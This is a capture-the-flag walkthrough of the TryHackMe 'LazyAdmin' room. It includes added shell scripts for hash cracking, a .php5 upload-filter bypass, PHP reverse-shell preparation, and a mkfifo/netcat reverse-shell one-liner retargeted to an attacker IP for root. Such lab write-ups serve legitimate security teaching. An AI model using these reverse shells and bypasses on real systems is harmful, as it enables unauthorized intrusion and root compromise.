LazyAdmin - TryHackMe Writeup
The link for this lab is located here: https://tryhackme.com/room/lazyadmin
An easy Linux machine to practice your skills.
Full Walkthrough
The first thing to do is run an Nmap scan across all 65,535 TCP ports so nothing on a non-standard port is missed.
Initially, two ports come back as open - SSH and HTTP. With this information, we can run a more detailed scan (default scripts and version detection) against just those two ports to gather version information and anything else that comes back.
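The two-stage scan described above as an added shell example, not the author's own scan output: the grepable Nmap output below is constructed to look like the first pass against this box (SSH and HTTP open), and the target IP 10.10.10.10 is a placeholder. The helper pulls the open ports out of a `-oG` file and builds the follow-up command, which is the part of the workflow worth scripting when you do it on every box.

```shell
# Added example, not from the original write-up. Two-stage Nmap: full port
# sweep to a grepable file, then -sC -sV on only the ports that were open.

# Constructed -oG output for a host with 22 and 80 open (10.10.10.10 is a
# placeholder, not the room's real address).
SAMPLE_GNMAP=$(printf '# Nmap 7.80 scan initiated\nHost: 10.10.10.10 ()\tStatus: Up\nHost: 10.10.10.10 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///\tIgnored State: closed (65533)\n# Nmap done\n')

# Extract the open TCP ports from grepable (-oG) output as a comma list,
# e.g. "22,80". Filtered/closed ports are dropped.
open_ports() {
    printf '%s\n' "$1" \
        | grep '^Host:.*Ports:' \
        | sed 's/.*Ports: //; s/Ignored State.*//' \
        | tr ',' '\n' \
        | awk -F/ '$2 == "open" {print $1}' \
        | tr -d ' \t' \
        | paste -sd, -
}

# Build the second-stage command: default scripts plus version detection on
# the ports from the first pass, saved in normal output format.
detailed_scan_cmd() {
    printf 'nmap -sC -sV -p %s -oN detailed.nmap %s\n' "$1" "$2"
}

# Against a live target the full sequence is (not run here, no network):
#   nmap -p- -T4 --min-rate 1000 -oG full.gnmap 10.10.10.10
#   ports=$(open_ports "$(cat full.gnmap)")
#   $(detailed_scan_cmd "$ports" 10.10.10.10)
open_ports "$SAMPLE_GNMAP"
detailed_scan_cmd "$(open_ports "$SAMPLE_GNMAP")" 10.10.10.10
```

`--min-rate` trades accuracy for speed; on a lab box it is fine, on a fragile production host drop it.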
We see that the web server is Apache httpd 2.4.18 on Ubuntu, but no other useful information comes back. The next step is to visit the web page itself to see what is being served.
It turns out to be the default Apache2 landing page. Since the site itself is not served at the web root, we can look for hidden directories with a tool like Feroxbuster.
Almost immediately, we see a directory called "content", which is not part of a default Apache install and could hold something interesting.
This looks much more like a real site. It is running SweetRice, which is a lightweight CMS. From here, we can look at the page source for anything interesting, but there is nothing useful in it.
Next, we can research whether any public exploits exist for SweetRice. Plenty come back, including an arbitrary file upload, a backup disclosure and a code execution issue.
Looking at the Backup Disclosure vulnerability, we can see that we can access all the MySQL backups from /inc/mysql_backup.
Knowing we need to find the /inc directory, we can run another Feroxbuster scan on the /content directory to see if the /inc directory exists - it does!
Knowing this, we can now access those MySQL backups.
We see there is indeed a SQL backup file that we can download. Once downloaded, we can open it and view the contents.
Looking through the file, we can see what looks like a password hash next to a username, which is probably admin or manager.
With this hash-looking string, we can use hash-identifier to take a guess at the algorithm. It reports MD5. Keep in mind that hash-identifier only goes by length and character set: a 32-character hex string is consistent with MD5 (Hashcat mode 0), but NTLM and MD4 look identical, so if mode 0 does not crack it, try those next.
To crack this hash, we can use Hashcat with the rockyou.txt wordlist. It cracks almost instantly and gives us the cleartext password Password123.
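The backup-to-credentials step, as an added shell example rather than the author's actual commands or file: the SQL excerpt below is constructed to resemble a SweetRice backup entry (the table and field names are made up), and the 32-hex string in it is the MD5 of the password recovered in this room. The cracker loops a small constructed wordlist through `md5sum`, which is enough to show the check Hashcat performs at scale; the real Hashcat invocation is in the comments.

```shell
# Added example, not from the original write-up. Pull MD5-shaped strings out of
# a SQL backup and crack them against a wordlist.

# Constructed excerpt in the style of a CMS backup; field names are invented.
SAMPLE_DUMP='INSERT INTO `cms_options` VALUES (1,"admin_info","2019-12-02",
"a:3:{s:4:\"name\";s:7:\"manager\";s:6:\"passwd\";s:32:\"42f749ade7f9e195bf475f37a44cafcb\";s:5:\"email\";s:0:\"\";}");'

# Constructed wordlist standing in for rockyou.txt.
WORDLIST=$(mktemp)
printf 'password\n123456\nletmein\nPassword123\nqwerty\n' > "$WORDLIST"

# Every unique 32-character lowercase-hex token in the dump. This shape is
# MD5 (hashcat -m 0) but also NTLM (-m 1000) and MD4 (-m 900), so a failed
# crack in mode 0 is not proof that the wordlist lacks the password.
extract_md5_hashes() {
    printf '%s\n' "$1" | grep -oE '[0-9a-f]{32}' | sort -u
}

# Dictionary attack: md5 each candidate and compare. Prints the plaintext and
# returns 0 on success, returns 1 if the wordlist is exhausted.
crack_md5() {
    target=$1
    wordlist=$2
    while IFS= read -r word || [ -n "$word" ]; do
        candidate=$(printf '%s' "$word" | md5sum | cut -d' ' -f1)
        if [ "$candidate" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$wordlist"
    return 1
}

# The equivalent real-world run, with the hash saved one per line:
#   extract_md5_hashes "$(cat mysql_backup.sql)" > hashes.txt
#   hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
#   hashcat -m 0 hashes.txt --show
HASH=$(extract_md5_hashes "$SAMPLE_DUMP")
crack_md5 "$HASH" "$WORDLIST"
```

Note `printf '%s'` rather than `echo`: `echo` appends a newline, which would hash a different string and never match.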
Clicking through the subdirectories Feroxbuster finds, we stumble onto a login panel located at /content/as/. We can try logging in with the cracked credentials of admin and Password123.
We gain access! We now have access to the backend panel for the website.
In addition, we can see the version running is 1.5.1, the version the published exploits target.
Knowing the version, we can look at another exploit we found - Arbitrary File Upload. Reading the code, we can see it simply uploads a file through the Media Center feature of the admin panel.
However, instead of running the script, we can navigate to Media Center ourselves and upload a file manually.
Reading through the code more, it uploads files with particular extensions, one of them being .php5. This indicates the upload filter blocks .php but not .php5. That matters because on Ubuntu 16.04's stock php7.0 Apache configuration the PHP handler's FilesMatch also covers .php3, .php4, .php5, .php7 and .phtml, so a blocklist of just .php is incomplete and a .php5 file still executes as PHP.
With this information, we can use PentestMonkey’s PHP reverse shell and simply change the extension to .php5.
Once the file is ready, we upload it and it succeeds!
Before executing it, we need to start a Netcat listener on the port set in the shell - I used 8888.
Then, we simply click on the file through the web browser to navigate to it. The browser hangs but we get a reverse connection back.
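Preparing the upload, as an added shell example and not the author's own commands: the PHP file below is a constructed stand-in for the header of PentestMonkey's php-reverse-shell (the real file has the same two `CHANGE THIS` lines followed by the shell code), and 10.11.3.112/8888 are the listener values from this write-up. The helper rewrites `$ip` and `$port` and saves the result with the extension that slips past the filter; the second function encodes which suffixes Ubuntu 16.04's stock php7.0 Apache config hands to the PHP handler, which is the property the bypass relies on.

```shell
# Added example, not from the original write-up. Set the callback address in
# a php-reverse-shell and save it under an extension the upload filter allows.

# Constructed stand-in for the top of pentestmonkey's php-reverse-shell.php.
SRC=$(mktemp)
cat > "$SRC" <<'EOF'
<?php
set_time_limit (0);
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
// ... remainder of the reverse shell omitted in this stand-in ...
EOF

# Rewrite the two CHANGE THIS lines and write the result to $4.
# [$] in the pattern is a literal dollar sign; $ in the replacement is literal.
prepare_revshell() {
    src=$1
    ip=$2
    port=$3
    out=$4
    sed -e "s/^[\$]ip = '[^']*';/\$ip = '$ip';/" \
        -e "s/^[\$]port = [0-9]*;/\$port = $port;/" "$src" > "$out"
}

# Ubuntu 16.04's php7.0.conf maps these suffixes to mod_php via
# FilesMatch ".+\.ph(p[3457]?|t|tml)$". SweetRice's filter blocks only .php,
# so .php5 (or .phtml) still runs server-side.
php_handled() {
    case "$1" in
        *.php|*.php3|*.php4|*.php5|*.php7|*.pht|*.phtml) return 0 ;;
        *) return 1 ;;
    esac
}

OUT=$(mktemp -d)/shell.php5
prepare_revshell "$SRC" 10.11.3.112 8888 "$OUT"
php_handled "$OUT" && grep -n 'CHANGE THIS' "$OUT"
# Then, against the target: nc -lvnp 8888, upload shell.php5 via Media
# Center, and request it from the browser or with curl.
```

Leaving the `// CHANGE THIS` comments in place is harmless; the point of the grep is to eyeball that both lines now carry your address before you upload.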
Just a side note - there is another way of doing this. Reading the code execution vulnerability, we can see that we can add an “ads” file with PHP code.
Navigating to the Ads Admin page and adding PHP code into the Ads code section, we can spawn a reverse shell.
After we save it, we now have a file called rev_shell.php.
Reading the code again, we see we execute it via the /ads directory.
Navigating to that directory does indeed show our revshellphp.php file
Once again, we can click on it and gain a reverse shell.
We have a shell running as www-data. With this, we can navigate to /home/itguy and grab the user.txt flag.
However, inside this folder there is also a text file called mysql_login.txt which is interesting.
Inside, we see credentials for what may be a MySQL server running somewhere we do not have access to - maybe there is credential reuse?
Keeping them in our back pocket, we can check for easy wins by listing our sudo permissions with sudo -l.
Here, we see that we are able to run a Perl script inside /home/itguy as root. Let's see what it does.
This script seems to simply execute a file - /etc/copy.sh. Once again, we can try reading the contents of this script.
Hmmm…. interesting. This seems to be a Bash one-liner for spawning a reverse shell. It seems to be connecting to 192.168.0.190 on port 5554 - maybe this machine has already been compromised internally.
With access to this script, let’s check what the permissions are.
The permissions indicate that anyone can read, write or execute this script. Combined with the fact that the script is executed through Perl as root, we can abuse this to get a reverse shell back to us as root.
For this, we can simply change the IP in the current file from 192.168.0.190 to our TryHackMe IP - in my case that is 10.11.3.112.
Then, we start a Netcat listener again on port 5554.
Finally, we run the Perl script with sudo to get a reverse shell connection back to us running as root.
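The privilege-escalation step, as an added shell example rather than the author's actual commands: the file below is a constructed stand-in for /etc/copy.sh using the address and port the write-up reports (192.168.0.190:5554), and 10.11.3.112 is the attacker address from this write-up. The first helper is the check that makes this chain work at all (root runs a script that a low-privileged user can write to); the second retargets the callback without touching anything else in the file. The script name listed by `sudo -l` is not repeated here, so the final `sudo perl` line is left generic.

```shell
# Added example, not from the original write-up. Verify that the script root
# will execute is writable by us, then point its reverse shell at our box.

# Constructed stand-in for /etc/copy.sh (written to a temp file, not /etc).
COPY_SH=$(mktemp)
printf 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f\n' > "$COPY_SH"
chmod 777 "$COPY_SH"

# True when the "other" write bit is set. -perm -002 is portable across GNU
# and BSD find; [ -w ] only tells you about the current user, which is not
# the question when root is the one executing the file.
world_writable() {
    [ -n "$(find "$1" -perm -002 2>/dev/null)" ]
}

# Replace the "nc <ip> <port>" target in a reverse-shell one-liner. Writes
# through a temp file because sed -i differs between GNU and BSD.
retarget_revshell() {
    file=$1
    ip=$2
    port=$3
    tmp=$(mktemp)
    sed -E "s/nc [0-9.]+ [0-9]+/nc $ip $port/" "$file" > "$tmp" && cat "$tmp" > "$file"
    rm -f "$tmp"
}

if world_writable "$COPY_SH"; then
    retarget_revshell "$COPY_SH" 10.11.3.112 5554
    cat "$COPY_SH"
fi
# On the target, after starting nc -lvnp 5554 on the attacking machine:
#   sudo /usr/bin/perl /home/itguy/<script listed by sudo -l>
```

Writing through `cat "$tmp" > "$file"` instead of `mv` keeps the original inode and mode bits, so the file stays exactly as root expects to find it.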
After we gain a root shell, we can finally grab the root.txt flag and finish this room.